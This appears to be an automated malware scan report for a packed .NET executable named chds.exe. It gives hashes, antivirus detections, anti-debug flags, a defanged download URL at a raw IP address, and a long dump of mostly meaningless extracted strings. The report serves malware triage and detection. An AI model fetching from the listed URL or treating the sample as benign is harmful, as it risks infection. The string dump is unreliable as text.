MalScore
100/100

chds.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 26/66 Related 2234
File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 313.00 KB (320512 bytes)
Compile time: 2018-03-21 23:45:10
MD5: fce344ec7f6879f961bca5c7b6a8d5aa
SHA1: f317d9b628835cbea76e39071b7ff8114f7b94ae
SHA256: bb6e552efc214121052b486702d03a09fe1cb4f1c2d2207d7ae0c033b2d4e443
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-03-22 17:42:01
Last submission: 2018-03-22 17:42:01
Filename detected: - chds.exe (1)
URL file hosting
hXXp://31.220.40.22/~harryhua/coco/chds.exe
VirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-03-22 16:36:15 [26/66] VirusTotal
PE Sections 3 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x4cd64 314880 2290eb9f207ced37375056b5092a7727 e33807c7b208135c1c8859bb5a901c186e24a5ee
.rsrc 0x50000 0x1000 4096 b0dcdc0851991e1c199fafc4ad09858a ddd025ed86b6d69437485140628a46eb52d57be8
.reloc 0x52000 0xc 512 fdb7f98fbd0d8d381ddf29ecb8df17e4 f4f9adf84e76701aa8d34350797b89ed436d7169
PE Resources
Name Offset Size Language Sublanguage Data
RT_VERSION 0x50058 572 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: chds.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: chds.exe
ProductVersion: 0.0.0.0
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
System.String[]
GetProperty
1WemO0exyVfmLpDHjYGoQ7qz
VsaytiNxzJsFBYS5UkUyVcTc
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
VarFileInfo
FileDescription
chds.exe
kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
ProductVersion
GetValue
System.Object[]
a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
StringFileInfo
1wc3fnlvoTrkBdFBq1sZN
OriginalFilename
parameters
w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
index
PikClDZLHhKW85mLQoMm44oT
System.Array
9hzBkiMoGFqbkwxHk4YOkzb8o6
FileVersion
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
0.0.0.0
ToString
CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
iyG8VmzmNNxr1lk9mScCZ2I
Mzm5dLWQuaduP2FVS6upc7y7as1p4
CxUixnoyRNPY90NdzR1PVqi
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
Translation
zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
Assembly Version
4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
System.Object
System.Text.StringBuilder
VS_VERSION_INFO
System.Reflection.MethodInfo
InternalName
CreateInstance
HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
bKMxHe5jkLgWiKg1K9Gja
System.Reflection.PropertInfo
Length
System.Activator
nHfDwkvmPdw5mf3GVqJqfj
GetMethod
Invoke
ddK3cdMoK5qitbyIbSohjm5PrfI
ele2SpPbTTSaPziyVVJIq
w1KXgtsrKEAFaH5sT4Xmoh1AnifGBLq3o8
So8w31iGx7bj26XA5eVc9CrPzKpJg
types
LegalCopyright
mJqi8ygpXgpFsdRlvNGMH
SetValue
obj
name
QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2`
GetType
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
000004b0
value
E1VJhVc9IyloJ9dngk4LbkJ
WJMMgwmn28XfKPmM7m2Isnnsi2CW
oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
System.Type
Append
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
zvHWC
Rqg#
Z$G4z6
p9D
=6k4
kE\=
j#Y9
c5|1
+P v\
,F^a
< [CV ,
ipZf
t H;|
:DXnx
5RsX
&u<d
Int32
-PiF
x.h
r%MW
?>z-
tlBO
>M`q{NRd
ao:j
"f1n
zPYV
LjE]\>
m ;Y
LFry
H'KTd
v1\.
A}Eywq
[dR~I
/gKuY>
=MHf0
-3]TP
{_h)El
x8aCF
tw6v
a[z+
|G}5
e&~5U
<Uet
")|T
TvG*
XB^b
\d[@{g
8U{a
+XF""
nyp{
o".?UKbMtU
nX ]
})46
[p,}
|)cm<l^E
<mQa8no
(%!&
vq$PP
J9F_
uQUg4qBP
Ku>K
Ea O
DKFp
[?m?
QUiZ
q l7
mV|<
r^tX
WO:t
wl{5e
+qGc
r* 4
rG
*bNHQ
MEuzE
$ g
N9dO
0)zj
DT\Le
cu3T
:7WQ9
J6b>
vK^w8
=Y:,
$*r
Cr'{
Q}X,
O/o?
or$"Uo
:Jcc
!H{!
OUeA
T"x37
xo8`"
t=m}
\~7
:n
tjL:
wg>e;
'\r`/
G+Z Q
`v,l
IThcC7
tGU.
%zeG( >(q=
zxx,j
q 1k
\_j
\UHU
a"Fz
/%l
= p"P_
ce'W
a_ U
]| Z
T/#6
M'l>
B Rs
E%`-0
SE@Hz
:h,J.WR8
9-i,m-
,8vE
52;8
U_
[K,W
%oRM
kB G
G+"_ /
System.Security
Y+Q:
?[;E!>0G
:6S/,
lVbm
l,C#
`k8(4
?euj
c'od
K5vF
iN \
!qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
B(-A
>GZ!
u.Pi
\b|x
LYVBV~
eRf]
,\ L
[D=o
iX$2
y2-F
uKCq
\;_!
Wxn<
Zj )
Tf.'
,}z
}~@(
f9-YL
_^ 6
oniE
(h^xUK
0-2N
)y}3
%Ubr@
C]/t
pZY[
4{Ku
trX>
"\H{
KH(0
'qrJo)
5ie
$${W*
1+C(G
,*;:'
x@64
94=+
{9([L]
^chd\
`X Vp
)"vR
fVN@
11$9
N L
D&!jE
~6]Fmq#v;
'u8l-!f
y_HP
?W'*LEq
k/tu
YyYy
'/q
bgaV
czx 2
C2 43
)wh F?
@Y=B[
h5de~
S}vPt.
&Rk)X
h}'`C 8
3ML$
ibv$
&38ocb
"XPq<
G42n
! Q'
%h V
#y q
$N8
ulC5
I{PJ
&&+`
GXd/
pSf$
p0Cln
m;sW
X'T(
fC2o3j
]Zr`3
#$Q
[9J|
YU#
+z/B@n
x{eg
"7s`z
}]]p7
Gp["
D4P]'
*-=yX
1 v!)
}QRm
;E60
HN8',-
b/agL
Bb32[
v2.0.50727
Oa!. 3y
Dq'LV_ 7
V{vQ2
sJi,(
pop|
V]-R(
'a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
,b\'
Vi7L
P)=@yv
A;gG
>T:$
^JM&
60wt
F-#*
q&C(
6W) v
/^1(
GB<|>
& ~c
fp:!T"
N|O~
.FLv+
ijyrsf
=\jvvw,
y"K<
$H|=
QM -
Q{9j
3kyyt
~p=<
k!zY
$CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
=\ Fq
h} KXg
4<9LU
O97J
Z/s,2i
tXae=
\&-1
Pn@{
<Y:qA
;pNQ
WAc@Sk
- zTX>E
Fs,]
UnverifiableCodeAttribute
WNQ#
Q<+n
"/ik
HS'm
-Pc#]e/R
!MW.
|+O
HE[N
i[$ e
U#&.(
4tB
O8\d
:X#+
9FD!C*[
$xr!
v.;P,
v~AC
/3|5
h9 I
pc^h
'% cE
T2)BF
j^.!
?. LL
qi4W
#Blob
mSSCN
B|x6|
Q01
h60/=
=kr~
3)S@0
7-0L
!( Uv
I3#+
s1@T
D;J ;
ZN \N
Nmeo
CC^y
kSVd
Ze/
b6M0S
&|Ii
V7Lz
0+ylQ
Gfc c
* %'
A/SO
T;8
@fQ<b
B3TK(
@\6Swm-
x5G
0lD\z
Type
*]oI
J,B4=
RuntimeTypeHandle
q#QJ:
rWRR
ol@
9&Hcf
=V/(
J\N5)
Q?NH
O&-}
6wdd
i?ez4
Ljuj
=Qm-
KgjqK3
Hz0;
/2PK_
oTxNk
,D&
;^8_@D
N2nq
@+fH;
bZ([
`_Mv
,mj9
VA
_CEI
EY\O
&f2
Q /&
]*Jj
A xy
RLe03OfCjp9xjV9Sw2QBmq.resources
6T/C
Ww:a
vDy
tP[E
MQ=5
aDI!W
Z6~h
,o5g
2@bP
;!z>B
{4o/
0>:
\ lZ
P#>,
3~s(
#E60%V
8rSR
D-B#
Ve u
C{9o*
txQ2
z?<b
LateGet
frlOt)
~t"8.
qE :
I+u/
X^|
B&BW
E,C%
3B/ma
}eP-
6)H}Z
!zy<
`{l\
RIs!U
Ez
1*9
j!Z$
;`,\q
?RrWC
5X2$jt
%=G,
NB
xnQ2
Ft})
chds
wlW$
U.Ki
b8K$!
/[ W
P`:P
y)#g
/%3(
~F5$z$
BJ4e
KQ0w
6iX{
>}%>Y
q+29w
r6=K
NFVkA`
t+!8e/
1@3[
,UFG
c[~]
=S{b
t&wj
=Hfr
FvNe!V
C_#<t
a,a)A
6qjL
10tg
b8fL
: Iv(}TR|
Sn;
k%d5:
>hB`j&
db23
~Cc`
T BnyqK
M]4
6vl mGS
CbaJ3
fyj.
Exception
yo&
v5Y
u \7
g?*'S
BtRT#
4#`Qs>
|VGQ[j|
O/Hs
.text
+IDY=
4* \
O-jJ
tnQ4
YXA
Py"2N.
dfMU
{=-C
A);L
QFrVD
P6"e/
CbF
gcON[[
yK*/
zYVf
,^TH
9{Hi-}!
\).
k_= a|
t[>$
jJ|p}
e+G,
>xE-c
GP<gC:?
cBT t
' Tn-
vX<|
b ~1r
/sAn
,Z9}%
v^
]N[pe
L'C
[|+#
/0I@N
'#-,@
IX%i
?;Ej
j-\G
Q0J*Roh
msXO|
mHO
6KGC
:F"=
* LC
2]#60
}k,Q
]mA_
<39A
;'4%
< fr;u
R%:_
%lsb
D1ELB
arpF
Q}:x
w|]yz
_vUR
f##g
A9g+DT
+_`<
qp
&G6L{
O:0$Oa
`>H,
\}gO
1h,s
A5~cT7
fSW=
XMw@[
'U(q
"v}'~T
-3]n
+!hp
Tu Y
=-cUAL
3{
C5 ]
b}c&
Nwyx
nO,Z
d!c0
%%y|
W'E,
.AO
h'|#
yF(k1
at J
]EB
LpsHh
~M-FD @
'3)U%
*|yv
]t
`QC&
qI2e)lk;
(D^c
bA a
[J |9dt
}}hz
8G#~31
(&zFh
<ToM5
]HAJ}
="B
le{0
`.rsrc
M;'eL
1Y|R
`KuGg
cq8!
<|7s
j:b3
O5 t
?4N:
43I|V
(65Q
j6 mf
N5I#Z
QU7xw
|glk
uqJz
' hbg_
]U>6
i\]"
XUIA
yNuKj
'$LU\
nFjL
5-N
.ctor
StU|
zk[
J9g,
j$x("
w1?R
Q)z$
M\9V
x"nV
T<Ne
)tc
<*C_
YjRE
+l
7?A}
tcn%
KCF~
i'.q
*]@
Fx.Si
t?a"O
% ek
p d}k
_JyW
BiTc
(pf-
z)sA
0S=`
UASF
`Q,CE
4f_,
J/79
H^ &n
S6Q3
q] !
2Q{nn
$E9
v)Z512<
. i<
,R:.
Lb`
]4$1
8TOv
& Pb
y$E%
v> P4!?z
`n @/`K
e.6#m
r3=w
G`Td(
? h(%zF
ghb?
Wr,8
Q*one
ujaR
^]_eY
*YYs
k!JI
M-\w
?*S# '| }6
4nG21
7>8G
M5*j
vT$-
*o{TFlTj
!MH?
ksl y;K
ey):
LyPAm5
+%t
3TibV
*7TuE1r^
q3RU
wbzC
/gUr
7z`"2
}?0-
=\qX
rv&19
#Tv=h
+,|ctbO
-\W
#QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2
N =}
MLWd
S`R
#:;'
FCPu
dj|j
^^?nJ
22[>3
P@[+u
?jzF
y { Z
@@H H
dF| na
C^mDK
WTS[
)``H^
dLN{+
hr"X:PvC)
3n'B
( CY
eT s
ngVi
2<RLW
0: ^
/O`E/
RXyI
%!'p
}t&\
GfSX
]hk =
4m`
oi75
vHGN
C,dXK%?SoZ
g yV
_ <_` _
08w9Q
A?FN
) '|:`)T
-l2 B
CJT~
^^Q=
H0[70
V4=(
v"he iO
8A!Fn
chY}
2s,5
5Mr_E
c+[/
J qzM5
O%Se
D)[=e
Y^>C
6f?X
z z;
mscoree.dll
15C[
>dy=3
?"m_
C r8
y5g>
(hci
v|[
_Dl
[+abIFgz
Wv
[RqFk
&)Z?
kpPV
h|dlf
z$`$L%
e}0u
{GCC
f[1|
^Ur?
{u.E
{hX15
6D\5L|
k!&=
WrapNonExceptionThrows
3223
nf1*
'q{Hm o
P fLHN
Y;d%j1
SwCH
aY\
BhV8z
R\"m
L!~
)tT,
hY%P
e;G|c
YW8dI
~\ 9
'@FB
B4,{
i3/2
6hiu
/&}
RgKI<C
( NR
={vh
dDnh
T15.
8LOFU
xtxqD
nu.>Vm
i oe
GH 6
kN1w
Y4#v
rHx2T
%N][f_f
mt=[
ybH~$
p7#m?
B4,R
%(S/
!6~}
4I{5
R?kh
\`oB)
*>`Sc
_O$r\_8\
DialogResult
=Rzi@
C4^w
[lVn
PueaR
M-e~
"cjg
Se4!H
Tr#F+
H'P03
G?_s
[Hiw
{0&
j"Mk
!2hN
iK3p
=mZb
$Pc!
)2 {T-
hV%2
.bCQ
b\E-
SnKG
f4GP
wNeY?
H}H
vwe}.
'a
4k u
,qNA
pPY8
M Kb
&?_nn
Lkz{
iO2-M
#u>+
\XK+H
:: [
CW_
:+-%
A@0%
K:86
W5&R
A`"g
H^rKi
6t-Y
9MFKl%
u:"p
~#|u
Vojb}
(J0n
+ J+
xO_o-
fnt8
.^`M
GIy#
0#<_
VJ^2
u)K\A
AE [B<
/_C Kl
I:xf
tG`#
tU}sp
EQL1
+]-C!4
w0|UR.
\0X$
.>^(:
CW-!
'R>d
=BfA1
DN-|be1kO
(O=
G#;G
e85'
~ SD
P73rK
]WYyK/
l(}9
QG.Ne
en'r
UAFH-
><T )
.X&Nog
#Strings
DQ +
;a[H|
P^GG
U-KX
1MJm?
NBn(
?};Ly<4)H@>
F`MP4
3;h_)
o~B'#
4s;S
~[K!x
yd9O
^7
akQe
nkud/j
qpIZd%
gM2u54
<x[Yj
^lRO8m
[ O?Rx
+XAS
!1iS
|Uy'
95s'("
UcxC
OXZR
#a
RCHN=
GSF"
E0D@
)QcwM]
)+vK
}zWq<
o K5,eA
[1-C
s:~e
\\sC
--K3
kL_3~
0}
90e5
2v' `x@koM
_khk
hxjH
sN6.
(~+[
OTz!hB
0M0H
_}1@
)h f
)#fN
fG6ZrVi
#1ASiBw
_]bnk
JPm*>
Wqat
# T[
.>_F
MJVy
System
s \ x8e
C&z5
tl'
14Tq
_v*]
S= erz0
xol+J
7~VM
PgR{
iMn{G
Ml3yM
z#`v
`;E>
*=!d8
*^x Z
e^+\
"/}G
!<lH!
05\j
8!6<
q#=?
wC%Typ
nWtn
SP_)
Ct#~
~Z ,
,u6!
MH|:L(
#E%k
6. PTI
>=S
*6u'=
TF+X
.>;%
P^ {
FYjY4
3N&7
^v{
CR{l
v/K]
A53i
tF<
Yx&
`YO
lQ!{@
",XH/
?V>
P:V:
wl|!d L1+
6K7H
PJ5
s1 7
U<&N
cF-OY 6x
oRi"
-V^w
]]ywk}>)w
Rd!7
b8C"
x3v.)
v(Z7
(T{{
ZJF^
k0 +
.;jT
)L J
CwWir6iz .z
#_W
c 0
gOHc
(EI-X
!*K*nB
@#W
JB^G
biA! &cg^5
g)
C6c}W
L$5s
;03VE()
"XQn
v!5)Q
Y%S}
U; Q
% G|Of
2Y?q
Xs7(
RvWj
Lfq&
5 B`Z
]y?R
SJ)ja
HgQ
$iz u
Q ~-*;=
ziXs
DU{
v`"{
\z P
f[9
dr<u
>|aA
E!A:
f@I9
\Y0l%
H6e3N
;%
3YZ#
Ai#u
E0P[
9j{Y:
YL^:
i.5+
La?}p
w>^p !
qI[w=7Q
W>buW
xJQw"/ d
97lQ
.'U
$6"Nx
MN8%yp
Q4~!,
8H;#
Q3g6
l($r,
0 `4}
%FN<D*K
X)Ao
lI?B
e$5k
x Sl
DTpz
8xG6
hOqm
ni_7^
MW:F7
9^FS
[3K:,
YYRM
goH(/%
es0q
GGmv
I#IDT
$) m
VT=N4
#fxP
5+y;,Ec
6xioc
M`dba
`IrK
g;j~
.Fwn{
Y @L
-Lq
C0C[,
Vi~y
dFYgs
x64
$6ob
GgF2
Otw7
!7Jn
&X][!<
I,Cf?A
Hu%-
kbsZ
X8
3~Py
Riv0E
.AQC
Dp,x
Qnd@
kc`U>:i
M4^K]
6~+G0
WSl+
QHi$
G\@bu
egtl
Vz[N.
mK5;/S
Omr
19$T
po<- V2
>xwo
}|g"O!
m88L_ ]
.[QJ~
wW 3v_
FU*+
%zT_\
?&pc
vA!Y
S9 d
;A)#
7egL#
\MtXz
Yc]U:
.>N&
y+q`I
|chU
gF B
ht.>%
:ESZ]
p|
Cewx
FNB4
'>qO
a3~J
uMO C
KFB
2 "Hh
h R"
AX;F
[;Qx
l ~HqRI+
0p=-
12=j
+_@V8
L7Pzd_O
BM~{hs
w#rL\
UC"c
~mQ
aBeQ
=Gww
pxr&2r7
)mUT
~UC
yyAv
,vu5
B5:6
Uwd5
_BT?
,:=w
Uebi
pV>*
9rTu
*;m
k0v{I
ParamArrayAttribute
%7ht
Xo"w
lFqv
)F/:j
aVR1 TP
@RW[
p 3M
|*)_v K
|!u#g7
" 7-
5 W[1
Ao[9e
`m_G>(
5ld$#Fzb
m@-c
x hg
q`g5)X
o{h
Y KCJ
Poq$
&*9w2
x`;K:u{
>$xM
M&bP")k
IhL
HUg~U&v
Vp\WPT
U]1;J
;FRfXo
D%a3
\./=
)~`6
9>?z
d0x3a
h^M;
?E#f
,6=@
3okoXw0
"'zn
l/<z
p_R-j
Sd*<
58C4
j9A{
=<n?'
bAXU
_"@(
*wyi`{
XU0n
nt P}
*&~`%
Hb&Ai
O EJ
N$^yA
<) s
V+#5/
ZT! 2
X6R
laf,
x2k]
\LZ;
<ewU5>3
=%>f
rtqAr
@=,w
/THOzzK
[*&H8
~>JT
->b[
Py,d
B'Ba
Pp+d
*P"5
0L[XV
L &w
7QN#
pN>g
C7)(g
^E(`j
(A e{
uF(;
CgBV6
)zM2"#
Qx'J
&,VoVh;UK
G\'K
]2g`
;/QO
#}wB
'Sa1q
A}wrFw<
f x
bs#$
!5X^f- 2!
!F O
bF)#
\cr<
G,pz
yp0'I
CtlW
'rv~+
'GWC
?]I9
bw)B
1 'z
yP7;
nR.n
9G[J
L8g3
,$I(
XBrgt
l#vV
vsq)U
Rc :=G
3,s`
A{ Fi
&HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
&i4T*m\
:zAC
/$?{
-V&3[jcR`
))WS
p*>+
:YJ4
tQ#-36
LSLu*
QHV7
4\[R
#_Tm
yQc35
@6uL
urDB
WH?]
C\2Ym
.= W
5g#0
Mv*W
w 7*
hUw g
bx^r
(!yL
k?W\
.=/?
mmqO
@x<N@"@
np{*
}4;9
m'%Nk
@c'`5
48'
U.L2Y
IE
"w&!H
p0!2
ZKvY
#J&4
f3UG3
CEzG
Kl3E
G@uxt
z~T{xv
fa#L
;*okZ
B O:>
ijLJ[+f|
D;z
BlUK
>vv1
P-;T
N)I79
>kE~
?!Wsr
xf\
p:A$
,H+7
=O'n
C@h X
r2_6mC
kp^R
$&tkP
v=GLBa
X^~\
,-X@
oMJ5
eqU_
&]H. <0c
*Cms
; Yu
=V<S
/{c8
lnE5
CU{ a$
0- k8l
JPV6
eYX~
yg#n
BEoT
k ]B
uyo>,
$ .3F
T>C$Q
u//;
}7 U2
[$:Q
raeZ
fIY\
/LRF f
ssXP
}ZZ4
NE`*
:!be`
L$`L
z~Pw
rz][D$
PAk[
3ITS
:g?#W
<D<@
F JG
.r:3'x
>h(1gX
x{k>
w Gi"cS.
@L9>
,;N
C7 7
e&?-
Xov^
241`
!ZHz
gl?7
"4GJ
yC+/&
^CR-
~H5v
!TLZ
84%0
}wB*
Tk )8-
wS5F
% KB
eTc2&
V=Y
z.f#h
7 5!
>?ZL
5nZR
obN7
LateBinding
, {R
Y$]4
r=0K3v
S,xF?
SkipVerification
BEIe
DdYtj
<k)
|xWN
SAS#
c}N?GuS
ohFe
m !YklKF;Jd
rl
$WU6
~1^X
#Lq
:`+a
FoT<
,HW5
/Mhc8
mtb[
!or6
nSM'
y($!J\
1m&m
> Qw
v'c)u
w * n
~KR on
MW?
7KD 8
c#ewpTgp+xv
yjCN
NTbD
QgY;
']rK
^-lO*
cy*^
,iH<
5Jb`H
`LT.
O< v
a9X:{"
a2*KZ
>#Az
pEb7
inn
(u $
W^YI
8[=D
P"y{|G-h
#4+-
9~ys{
'b_y
mMX"
vRnK
2Gdw
[.:f
:|^z;
'c]-
% +I
b(TLZ{utE
hUY0F
1Su_
1 r/
iE0"y
$gCl%
7~d+H
@+\q
BP9Ug
e *#
C0rA
q2Pr0^~z
1_b'
hP:&
rr/|G
&f<Z
G +}
}t)&
-U nc
L%yCFc
<=L}
X@8N
!i/z
a q\
B5DZi:X
8VFA
C%;zo0K
E|H(
6IFf
3 uwV
Ck9e
SCIO
Dy|^J^
? 3elL
Bmgk
<G P
+#+g
cm]a
hyg*
@.reloc
T |@
i0gG
jvq
HYs8dQ
:V<Q
n|8]
X:cm
|@:o
3"jO
TF)O
2b Q
<n ,
wWaAM
?Z6 {u
%Y*{
Uo5
R920n
1JXlL1
,AGl
Qgk3
{fL(*
0'q+
&ym3d
(tq%z!
OI,8
27X{r=
om] B
La-a
k&JZ4
-Uip!
'eu
!";$
36ZM
-{t&
%zb+>
i|
7;0EGM e(
[#@+*
du<t
o[i\
pC~
` t<
8BJfq
DNeX
vPWa}
nx"]c
~) MY
:?(P
BZFOK
w:Q%
$({s.
~II4
?#zH
2-}O
k-x$
End9
>"K|I
1Rb]F
@)t1x
lCpQ
Xrm3
r+C'
-9Ym
=cDKJu!
GetType
9)W~
br3F
*yVJ
< VN
lR};
`" x!a
F,v1~T
xFxp
58xu
)i!V
;_WI
8- \ x/
h}<>
bAtYk
Z3-(
/I $BC
Itin
(]&y
wY[V3
Em&D
m_v{r
>'~R
^lDX
c_fg
:?h9
E|1/
o0\]>
N;?g:
29II~
VV*<
#/@m
^'Q<S
c)bZY
=FhK
oue\
0h9w
.'Sy
4Vc]9
N(E[onk
o2628
pA'>
`@53&
@Fq!
\Exk
D9S0
,=M%
p?5x
c%Dt q
PKjN
U ~ B
B;O
4aa_Cj
]f&y
k+9rj`
LQ x p
P~ '
hwk1
"`6
W5@H
;cv.
m1^6d
l'yX
IE.v
1!'P|
[ ;=}
E1VJhVc9IyloJ9dngk4LbkJ
t\B@C@
Fe&Y
Y{ l
!W&<
_V> 5
J)xW
~diX
Y"Jdg
e6UV
P3}R
S@%%
| ,hp
GVo8
F*.)jTV=;
RuntimeCompatibilityAttribute
zT5
y+MW@
% R,
u m-
hO0`
zj*k
:h:"
@lV6a
G}3
=7W+T
OeV
/boBs3
^;uE:
00} _r
1wc3fnlvoTrkBdFBq1sZN
_gs|
YWGM
?Z2`
g)/G
bDV
J2_
Microsoft.VisualBasic.CompilerServices
E+sFU2
\h>`
]6O;
(>;MI;
wu`%G
+3=;
+Cl=ft
*5e!m7b!
T7:V
&bw(q
NvPM
":NM
MoW]]
Nu [7
^npJ
b]1f
!dE$
A92%.
I#@,l
\&!7
oHbT
]`
27yP
nec;
|[l*q%
`]Q
iQ+_
)9 8=
Wf>g
i!O+
P:vu<
T#Bf_
QK9
M="L
MxFe
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
mt>D
-}')
7JlQ
5s(W(
x?lE
N`H{
t#hE
Z a
) =ar
"%/p
q7Fp
bWV7&
,~&@@
G4n-
M)jkrP
&W^c
/E'o
b5!u*
BzVg
(-O._
<l eS>
iCU
!nIac
<}k|
7WmTC
#w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
/*fV
tn7
>+4.[
TL5X
; d
QPnd
MessageBox
T"QZS
JjQ-&^yYh
6-dc
U aEAM0
+/5}{
EV$|
gJ1
r,OLJ
N@{
V>E6
X6(nE
CHI8|
B+sz
b_Em
7,&~
?u*@B\
1Ja4y
UjbL[
(i'%
PF>0
'wC-
^y*e
qFFF
a[+!
*
i>
%c!vhzm
tm8q
:n{,+
{M#8~<I
no(.
^%~P"=
venu
8f`,
$UN
/q ~
}>f$N*
P:0E
x#}t
>Wo2B
@):1
Lh9egt9<
<$`,
/[5oa
x9/eF G
Q_e< b
h< 1_1
j&>b
Y2"D
B'@1
3<B^
p#"k
?On\
}@xq
RCI>U
c |r A
d:d^
Lm k
G o<
,l{!
#DA
iFK2'
f]|&
;>$j
kHq
r;kw
Xsdg6
9 $z
8M
Ta#j ~
)wUh
Ul=I
3DQ`Q
9NrXCH
?Aw}
\|9+{
5 \.
Ro^#C,v
?<%s
<mhe/
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
o!Ys9
Q6IG
\%QP
0&nJ\
xo>F4Uk
eX^L
crL
luX?
#v|F
aH`0"9
wFT^^
a"HD
(${z
)\6i
k1^[
8/gu
;mmItZ
[Dg+
6++9
D6PP
GK2A
? %V
z{}p
[ >b
Vc4R
rF J
u<t/
XgeH?
| 5
R36o
dY;k
>BkI
Ec{ P
q'w
_|.i
Pi\L
2b6.:
YIidF`
5 C21RZ
CPH^
_a%c
jC4| sv
hVuc
74^F8"
K==e
~*#{b
^*>nqA]a^
g/$R'
Tj iS>_
y{c9j
tEIs
+{V_
MF]Q0
>-e M
\ @'
xp5yW
@sr|
L CU
C-]j
Tv D}
#_Zi
x8$,3
3^]=
k >jb:
UO9KkO7
}.E#
p0p)
WI/@
)YFq
,q|;
(%*n
</jT
M5$V
Nv S3
H+7f
m9E'
VzLln
cK{zxV
(3(0
0r g
BH+5
x_S#)L
HJ/d
l1wD
i|d.
)#O+
K8Z2E
V i6
n0puwV
h+z&
vWr
HCs#
2[='
=3*2
@`(W
7N(T
Tw<\
0B%/
K@:a
rDI/
IC1x
/#}y
M"
}RPb
blG}b
r5 HFJN s
*=w 4
} JXe
a.D'K
.Xw,/
QxbY]
d oI
~ jm-
}D, la"
!5\q
M?/Zx
$B4
>AZ1
V3[$
1^%y
8Pt F+
lYPQ
h[gvS
System.Windows.Forms
PQ[*
KMDM
H,Zr?
8&Zb\
XC@P(D
"(lD
UjA+
%-40
cbc
AR^Y
A61A
X0,\
So8w31iGx7bj26XA5eVc9CrPzKpJg
&(.:
P{^\6
2rG*'
uB-TeC
17X>
Fy SKcv
M:qE{t
t%]
U3~e
v,yv
h2~<
'<1I
k0Z+
v,t`
)(6_
x!/q
w!Vr
yP,
#\$
J6 jxM
P<Fc
w=sp
"MM'
k 1R|
smb
CFE7
DL= Ms6\
[0Ot8
0Pfd
! 13
CtXg
R[|c
96f4L
%S(zB6y m
j_*1
DBS_
64SU
2a&n
Nhzc
Pa~D
Yn*~~
j!'Q-*
RETJAWj4r
b> ^p
Gf51
iyG8VmzmNNxr1lk9mScCZ2I
QEVAa
P.#fvC
0s,;I$!
P/`/5
?ym->nd@
XUFs8/[
G,&c
/n BR.
'@>oY2
cwZB
Mx|-.,y
6;V&
K( c,
j<gE
HZ:|
_ zm
\_sP||
\Vrr)>
D$`X
841>
"('t
ugb>
f#sZ
QYt$N
FcS<a
-;7i
aK`)
#gID
aK!h
deRrG8r;?
f`]r3
%0(tn"AkE1`
*i XVw
t Mn
9fccUxlH
"a7CA
Q![u
vwnEP
U'Gko
4`3NkQ
8 !(
ki$+
k{C?
W+ve
p[6\nEx
]/I$
CRf
vlT32
pSn
+ky|"_u
Va/Y#\[
8+!aY
g)4|
FN H
Iv#}k
NCAu
n !E
Ei?bi
sPk -
dE@]
FE6t
88x Y
"*X;
rLad
m=O:
VZ5C
ZrF#k
J<G'{
%x+z
PMwZ
~f<5
;~i0
(3C(
B4)) J.j
Cm!\
59Tv
}/3U
8>+<
2dk5
l+O
3 + ?
S5;I
Rb)*
3,)u
yh]f80
cPV%
?,;9z
u>>M
e8Uk
RUWV
('l6
&-Sn+
5?_au
0g` q
l\X\
iILc
+:d<&
*$-K e
J|o5^V
?I,)
1Zib
v\=9
R[!PMn
HT&u
O @]e(
% I^
gM N
"k[N
x{_c
he m]
=Hn|
d! n
FX :
EmNw-
0v5D
&(}ZC_
U;GgFV
P&;:?
6Rp=TD
L~4f
7cqkECT
mCSE|
_.gu
-TRW
('X
%Fu8
!y_
o9GMI
.s\8
:B 6
UEpC
zh^~
sOxK
>qsP
2S>@g
s)$=
=Xf"K
)Vm%<
}R1;
6m^1
[xQin
u17B
vl_-
aCp@,;
Lh,&
0[m\
zLWj
>BTe]
jeM30
%'\)(
\i}~
rbV3D
!?*9
7~b=!
HSYa
|// F
L/Gg
#=\w
@[S1#
jmVR
tT]E3~
2[%[
>y*w
p/%q2
DNcKe`
T$R.
Fj!?
ojg J
x`[i
C v(0
W6w&
:t- 8<
QhC_
System.Runtime.CompilerServices
feyc
Microsoft.VisualBasic
|-:n
3,q
a0i!
!Qpw
A`uR
Object
9[XX
S -p
4?P]^:
76&5
X(_s
#tv,
'<MH
9Cm=`
3(}FS
Nq]:
v#44o
